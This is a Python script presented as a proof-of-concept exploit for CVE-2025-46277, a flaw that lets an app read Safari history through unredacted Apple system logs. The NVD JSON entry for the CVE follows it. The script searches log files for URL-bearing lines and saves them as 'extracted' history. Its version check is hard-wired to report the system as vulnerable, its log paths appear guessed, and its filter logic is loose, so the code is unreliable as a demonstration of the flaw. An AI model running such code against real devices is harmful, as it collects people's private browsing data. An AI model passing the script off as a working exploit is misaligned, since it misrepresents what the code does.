CVE-2025-46277

# CVE-2025-46277 PoC - Safari History Access via Log Files # This PoC demonstrates the vulnerability where an app can access # user's Safari history through unredacted system logs import os import sys import json from datetime import datetime def check_vulnerable_version(): """Check if current system version is vulnerable""" # Simulated version check vulnerable_versions = { 'iOS': ['< 26.2'], 'iPadOS': ['< 26.2'], 'macOS': ['< 26.2'], 'watchOS': ['< 26.2'] } return True # Assume vulnerable for demonstration def read_safari_logs(): """ Read Safari-related logs from system log directory In vulnerable versions, logs contain unredacted browsing history """ log_paths = [ '/var/log/system.log', '~/Library/Logs/CoreSimulation/Safari', '/private/var/log/asl/Safari.asl' ] extracted_history = [] for log_path in log_paths: expanded_path = os.path.expanduser(log_path) if os.path.exists(expanded_path): try: with open(expanded_path, 'r', encoding='utf-8', errors='ignore') as f: for line in f: # Look for Safari history patterns in logs if 'Safari' in line and 'URL' in line or 'history' in line.lower(): # Extract potential history entries if 'http' in line or 'www.' in line: extracted_history.append({ 'timestamp': datetime.now().isoformat(), 'source': log_path, 'data': line.strip() }) except PermissionError: print(f"[-] Permission denied: {log_path}") except Exception as e: print(f"[-] Error reading {log_path}: {e}") return extracted_history def exploit_cve_2025_46277(): """ Main exploitation function for CVE-2025-46277 Demonstrates accessing Safari history through unredacted logs """ print("[*] CVE-2025-46277 PoC - Safari History Access via Logs") print("[*] Target: Apple iOS/macOS/iPadOS/watchOS < 26.2") print("-" * 60) if not check_vulnerable_version(): print("[+] System appears to be patched") return None print("[*] Attempting to read Safari-related system logs...") history_data = read_safari_logs() if history_data: print(f"[+] Successfully extracted {len(history_data)} history entries") print("\n[+] Sample extracted data:") for entry in history_data[:5]: print(f" - {entry['data']}") # Save extracted data output_file = 'extracted_safari_history.json' with open(output_file, 'w') as f: json.dump(history_data, f, indent=2) print(f"\n[+] Data saved to: {output_file}") return history_data else: print("[-] No Safari history data found in logs") return None if __name__ == '__main__': exploit_cve_2025_46277()

{"cve": {"id": "CVE-2025-46277", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:13.150", "lastModified": "2026-04-02T19:21:02.547", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A logging issue was addressed with improved data redaction. This issue is fixed in iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, watchOS 26.2. An app may be able to access a user’s Safari history."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EA029506-5678-444B-93B5-27DAD643A1C0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "6276FDCA-3407-4FDD-8437-B57C98A97084"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "15574823-ECE0-4394-99BC-6AFA34E599CC"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125890", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}